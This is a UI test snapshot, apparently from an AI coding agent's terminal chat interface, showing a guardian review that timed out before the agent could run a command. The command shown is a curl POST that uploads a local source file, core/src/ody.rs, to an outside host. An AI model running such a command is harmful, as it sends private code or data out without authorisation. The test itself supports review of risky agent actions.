tui/src/chatwidget/snapshots/ody_tui__chatwidget__tests__app_server_guardian_review_timed_out_renders_timed_out_request.snap
---
source: tui/src/chatwidget/tests/guardian.rs
expression: normalize_snapshot_paths(term.backend().vt100().screen().contents())
---







✗ Review timed out before ody could run curl -sS -i -X POST --data-binary
  @core/src/ody.rs https://example.com

• Working (0s • esc to interrupt)


› Ask Ody to do anything

  kimi/deepseek-chat
